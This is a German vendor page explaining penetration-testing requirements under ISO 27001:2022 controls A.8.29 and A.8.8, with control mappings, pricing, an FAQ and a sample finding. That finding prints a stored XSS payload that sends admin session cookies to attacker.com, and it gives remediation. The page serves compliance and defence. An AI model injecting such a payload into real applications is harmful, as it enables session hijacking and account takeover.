ISO 27001 Penetrationstest: Anforderungen aus A.8.29 und A.8.8 der Revision 2022

ISO 27001:2022 (veröffentlicht Oktober 2022, Übergangszeit bis Oktober 2025) hat den Annex A grundlegend überarbeitet und explizit 'Security Testing in Development and Acceptance Environments' (A.8.29) sowie 'Management of Technical Vulnerabilities' (A.8.8) als Controls eingeführt. Für Unternehmen mit ISO 27001-Zertifizierung oder auf dem Weg dazu sind Penetrationstests nicht mehr optional — sie sind der zentrale Nachweis für die Wirksamkeit des ISMS. Dieser Leitfaden erklärt, was die 2022-Revision konkret von Ihnen fordert und wie ein Pentest-Bericht Ihren Auditor überzeugt.

ISO 27001-Pentest starten

Geschrieben von Malte Wagenbach

Gründer von Matproof Security. Spezialisiert auf KI-gestützte Penetrationstests und EU-Compliance (DORA, NIS2, BSI Grundschutz, ISO 27001).

Zuletzt überprüft: 17. Mai 2026

ISO 27001:2022 — was sich für Penetrationstests geändert hat

Die Revision von ISO 27001 im Oktober 2022 (ISO/IEC 27001:2022) hat den Annex A von 114 auf 93 Controls reduziert — aber dabei die Sicherheitstest-Anforderungen deutlich konkreter formuliert. A.8.29 (Security Testing in Development and Acceptance) ist ein neues Control und adressiert direkt Penetrationstests: 'Security testing shall be defined and implemented to verify that information security requirements are met when applications or code are developed or updated within the development lifecycle.' A.8.8 (Management of Technical Vulnerabilities) erweitert das bisherige A.12.6.1 und fordert explizit eine 'timely identification of technical vulnerabilities' — in der Praxis bedeutet das ein Kombination aus kontinuierlichem Schwachstellenscan und regelmäßigen Penetrationstests. ISO 27001-Auditoren (zertifiziert nach ISO/IEC 27006) prüfen A.8.29 typischerweise durch Sichtung der Pentest-Ergebnisse der letzten 12 Monate und Verifikation, dass kritische Findings behoben wurden. Ohne aktuelle Pentest-Berichte droht ein 'Minor Nonconformity'- oder — bei kritischen Systemen ohne Tests — ein 'Major Nonconformity'-Befund, der das Zertifikat gefährdet.

ISO 27001:2022 A.8.29 (Security Testing in Development and Acceptance): Neues Control — verlangt definierte Sicherheitstests für alle Systeme in Entwicklung und Abnahme. Penetrationstests sind das primäre Instrument für Systeme mit erhöhtem Schutzbedarf.
ISO 27001:2022 A.8.8 (Management of Technical Vulnerabilities): Erweitert A.12.6.1 der 2013-Version — verlangt systematisches Schwachstellenmanagement mit zeitgerechter Identifikation und Behebung. Penetrationstests identifizieren die Schwachstellen, die Scanner-Tools nicht finden.
ISO 27001:2022 A.8.25 (Secure Development Lifecycle): Security by Design als Pflicht für den Entwicklungsprozess — Penetrationstests sind ein wesentlicher Baustein des SDL (Secure Development Lifecycle) neben Code Reviews und SAST/DAST.
ISO 27001:2022 A.5.36 (Compliance with Policies and Standards): Regelmäßige Überprüfung der Einhaltung aller Sicherheitsrichtlinien — Auditor prüft, ob interne Pentest-Policy vorhanden und eingehalten wird.
Übergangsperiode: Bis Oktober 2025 müssen alle bestehenden ISO 27001:2013-Zertifikate auf die 2022-Version umgestellt sein. Die neuen Controls (inkl. A.8.29) müssen implementiert und nachgewiesen sein.
ISO 27001-Audit-Praxis: Auditoren nach ISO/IEC 27006 prüfen bei Überwachungsaudits und Rezertifizierungen explizit die Pentest-Berichte der letzten 12 Monate sowie den Nachweis, dass kritische Befunde adressiert wurden.
Cross-Compliance-Effizienz: Ein gut strukturierter Pentest-Bericht mit explizitem Mapping kann gleichzeitig für ISO 27001 (A.8.29/A.8.8), NIS2 (Art. 21), DORA (Art. 24), BSI IT-Grundschutz (APP.3.1.A11) und SOC 2 (CC7.1) als Nachweis dienen.

Was ein ISO 27001-konformer Penetrationstest abdeckt

A.8.29 Security Testing in Development: Sicherheitstests für alle wesentlichen Anwendungen — Web-Anwendungen, APIs, Mobile Apps, interne Tools. Fokus: Sicherheitsanforderungen aus dem Secure Development Lifecycle.
A.8.8 Technical Vulnerability Management: Vollständiger Schwachstellenscan + Penetrationstest für alle kritischen Systeme — priorisiert nach CVSS, NVD-Datenbank, EPSS (Exploit Prediction Scoring System).
A.8.3 Information Access Restriction: Autorisierungslogik-Tests — IDOR (Insecure Direct Object Reference), vertikale Privilegieneskalation, Tenancy-Isolation, API-Scope-Enforcement.
A.8.5 Secure Authentication: Authentifizierungs-Tests — Brute-Force, Account-Enumeration, MFA-Bypass, OAuth2/OIDC-Flows, SAML-Assertion-Manipulation, Passwort-Reset-Schwächen.
A.8.24 Use of Cryptography: TLS-Konfiguration (kein TLS 1.0/1.1, keine schwachen Cipher-Suites), JWT-Algorithmus-Validierung, Passwort-Hashing (bcrypt/Argon2 statt MD5/SHA1), Schlüssellängen.
A.8.20 Networks Security: Netzwerksegmentierung, Firewall-Bypass-Tests, exponierte Management-Schnittstellen, laterale Bewegung zwischen Segmenten.
A.8.6 Capacity Management und A.8.7 Protection against Malware: DoS-Resistenz-Tests (Rate-Limiting, DDoS-Mitigation), SCA gegen bekannte Malware-Bibliotheken.
A.5.23 Information Security for Use of Cloud Services: Cloud-Infrastruktur-Tests (IAM-Fehlkonfigurationen, S3-Bucket-Berechtigungen, exponierte Storage, Service-Account-Keys) — für AWS/Azure/GCP-Umgebungen.
A.5.30 ICT Readiness for Business Continuity: Backup-Systeme-Sicherheit, Recovery-Prozesse, Offline-Backup-Isolation gegen Ransomware.
A.6.8 Information Security Event Reporting: Verifikation ob Angriffs-Aktivitäten im SIEM detektiert werden — die 'detect what we do'-Prüfung als Qualitätsmerkmal des Pentest-Berichts.

Beispiel-Befund

Hoch

Stored XSS in Admin-Interface durch fehlende Content-Security-Policy (A.8.29-Verstoß)

Das Admin-Dashboard (/admin/users) rendert den vom Benutzer eingegebenen 'Display Name' ohne HTML-Encoding direkt in die Seite. Ein Angreifer mit Standard-Benutzer-Konto kann den Display Name auf '<script>document.location=https://attacker.com/steal?c='+document.cookie</script>' setzen. Wenn ein Administrator die Benutzerliste aufruft, wird das Script im Admin-Kontext ausgeführt und das Session-Cookie (inkl. CSRF-Token) an den Angreifer übertragen. Da keine Content-Security-Policy konfiguriert ist, gibt es keine browser-seitige Schutzebene. Über das gestohlene Admin-Session kann der Angreifer alle Benutzer verwalten, Daten exportieren und System-Konfigurationen ändern. ISO 27001:2022 A.8.29 verlangt explizit Tests auf XSS als Teil der Security Testing-Anforderungen.

Behebung: Output-Encoding aller benutzerkontrollierten Daten beim Rendern in HTML (HTMLEncode/escapeHtml). Content-Security-Policy implementieren: 'Content-Security-Policy: default-src self; script-src self; object-src none; base-uri self' — verhindert Inline-Scripts und externe Script-Quellen. Input-Validierung: Display-Names auf erlaubte Zeichen einschränken (Alphanumerisch + wenige Sonderzeichen). Session-Cookies mit HttpOnly und SameSite=Strict. Nach Fix: Re-Test und Nachweis der Behebung für ISO 27001-Auditor dokumentieren (A.8.29-Nachweispflicht).

Referenz: CWE-79 Improper Neutralization of Input (Cross-Site Scripting) · OWASP A03:2021 Injection · CVE-2021-43798 (Grafana Path Traversal, ähnliches Admin-Interface-Muster) · ISO 27001:2022 A.8.29 Security Testing · A.8.3 Information Access Restriction

ISO 27001 Pentest: Optionen im Vergleich

—	Kostenloser Scan	Matproof Sentinel	Klassische Beratung
Automatisierte Scan-Engine	✓ (3-min Vorschau)	✓ Vollständiger Scan	✗ Nur manuell
OWASP Top 10 Abdeckung	Partiell	✓ Vollständig	✓ Vollständig
Proof-of-Exploit-Evidenz	✗	✓ Pro Befund	✓ Pro Befund
Regulatorisches Mapping (DORA/NIS2/ISO 27001)	✗	✓ Automatisiert	✓ Manuell
Audit-tauglicher PDF-Bericht	✗	✓ Sofort	✓ 2–4 Wochen Lieferzeit
Kontinuierliche / wiederkehrende Scans	✗	✓ Pro Deploy	✗ Jährliches Engagement
Zeit bis zum ersten Ergebnis	~3 Min.	~30 Min. Vollscan	2–4 Wochen
Preis	€0	Ab €149	€8.000–€25.000
Quellcode-Review (SAST)	✗	✓ Im Growth-Plan	✓ Im Scope
API-Testing (REST/GraphQL)	✗	✓ Automatisiert	✓ Manuell

ISO 27001-konforme Pentest-Pakete

Einzel-Scan

€149 einmalig

1 vollständiger Pentest-Scan
KI-priorisierte Befunde mit CVSS 3.1
Proof-of-Exploit für jedes Finding
PDF-Bericht (audit-tauglich)
Regulatorisches Mapping (DORA, NIS2, BSI)

Einzel-Scan kaufen →

Häufige Fragen zum ISO 27001 Penetrationstest

Verlangt ISO 27001:2022 explizit einen Penetrationstest?

Ja — Control A.8.29 ('Security Testing in Development and Acceptance Environments') verlangt explizit definierte Sicherheitstests für Systeme in Entwicklung und Abnahme. Control A.8.8 ('Management of Technical Vulnerabilities') verlangt systematisches Schwachstellenmanagement. ISO 27001-Auditoren interpretieren dies in der Praxis als Pflicht zu Penetrationstests für Systeme mit erhöhtem Schutzbedarf — ein Vulnerability Scan allein reicht typischerweise nicht als Nachweis.

Wie oft muss für ISO 27001 ein Penetrationstest durchgeführt werden?

ISO 27001 schreibt keine feste Frequenz vor, aber die Praxis und Auditor-Erwartungen gehen von mindestens jährlichen Penetrationstests für kritische Systeme aus. Zusätzlich: anlassbezogene Tests nach wesentlichen Systemänderungen (A.8.29: 'when applications or code are developed or updated'). Empfehlung: jährlicher vollständiger Pentest + kontinuierliche Scans (z.B. Matproof Sentinel) nach jedem Deployment.

Was prüft ein ISO 27001-Auditor beim Thema Penetrationstest?

ISO 27001-Auditoren (akkreditiert nach ISO/IEC 27006) prüfen bei Überwachungsaudits: (1) Existenz einer dokumentierten Pentest-Policy/Verfahren. (2) Aktuelle Pentest-Berichte (max. 12 Monate) für alle kritischen Systeme. (3) Nachweis, dass kritische und hohe Befunde adressiert wurden (Behebung oder Risikoakzeptanz mit Begründung). (4) Statement of Applicability (SoA) mit Begründung für A.8.29. Fehlen Pentest-Berichte oder sind kritische Findings unbehandelt, droht ein Minor oder Major Nonconformity.

Was ist der Unterschied zwischen ISO 27001:2013 und :2022 für Penetrationstests?

In ISO 27001:2013 gab es A.12.6.1 (Management of Technical Vulnerabilities) als relevantes Control — Penetrationstests waren implizit enthalten. ISO 27001:2022 hat A.8.29 (Security Testing) als explizites neues Control eingeführt und A.8.8 (Vulnerability Management) als Nachfolger von A.12.6.1 erweitert. Die 2022-Version macht Penetrationstests damit zu einem expliziten, nicht mehr impliziten Bestandteil. Übergangszeit: bis Oktober 2025 müssen alle bestehenden 2013-Zertifikate umgestellt sein.

Kann ich mit einem Matproof-Pentest-Bericht zu ISO 27001 zertifiziert werden?

Ein Matproof Sentinel PDF-Bericht enthält explizites ISO 27001:2022 Annex A-Mapping (A.8.3, A.8.5, A.8.8, A.8.20, A.8.24, A.8.25, A.8.29) und ist für ISO 27001-Auditoren verwertbar. Die Zertifizierung selbst erfordert aber ein akkreditiertes Zertifizierungsunternehmen (DAkkS-akkreditierte Zertifizierungsstelle) und einen vollständig implementierten ISMS — der Pentest-Bericht ist ein Bestandteil davon, nicht der alleinige Nachweis.

Wie verhält sich ISO 27001 zu NIS2 und DORA für Penetrationstests?

ISO 27001-Zertifizierung entbindet nicht von NIS2- oder DORA-Anforderungen — die Regelwerke ergänzen sich. NIS2 Art. 21 und DORA Art. 24 verlangen eigenständige Nachweise über Penetrationstests, auch wenn ISO 27001 bereits besteht. Positiv: Ein gut strukturierter Pentest-Bericht mit Multi-Framework-Mapping (ISO 27001 + NIS2 + DORA) deckt alle drei Anforderungen mit einem einzigen Engagement ab — das ist unsere Standard-Leistung.

Was ist der SOC 2 CC7.1 und wie hängt er mit ISO 27001 A.8.29 zusammen?

SOC 2 Common Criterion CC7.1 ('To meet its objectives, the entity uses detection and monitoring procedures') verlangt regelmäßige Sicherheitstests — in der Praxis auch Penetrationstests. Der Nachweis ist ähnlich zu ISO 27001 A.8.29: aktueller Pentest-Bericht, Beweis der Behebung kritischer Findings. Wenn Ihr Unternehmen beide Nachweise benötigt (ISO 27001 + SOC 2), kann ein einziger Pentest-Bericht mit entsprechendem Mapping beide Anforderungen abdecken.

Wie lange dauert ein ISO 27001-konformer Pentest mit Matproof?

Vorschau-Scan (kostenlos): 3 Minuten, erste Befunde zu TLS, Security-Headern, DNS, exponierten Pfaden. Vollständiger ISO 27001-konformer Pentest (ab €149): 30–60 Minuten für typische Webanwendung, PDF-Bericht mit A.8.29/A.8.8-Mapping automatisch generiert. Für komplexere Scopes (mehrere Systeme, API-Pentests, Infrastruktur) empfehlen wir den Growth-Plan. Der Bericht ist sofort nach dem Scan verfügbar — kein Warten auf Beratungstermin.

Vertiefen — verwandte Artikel aus unserem Blog

ISO 27001-konformen Pentest für Ihre Zertifizierung starten

Erfüllen Sie ISO 27001:2022 Controls A.8.29 und A.8.8 mit einem audit-bereiten Penetrationstest-Bericht. Explizites Annex A-Mapping, Multi-Framework-Coverage (ISO 27001 + NIS2 + DORA), PDF-Bericht in Stunden. Für Ihren nächsten Überwachungsaudit oder die Erst-Zertifizierung.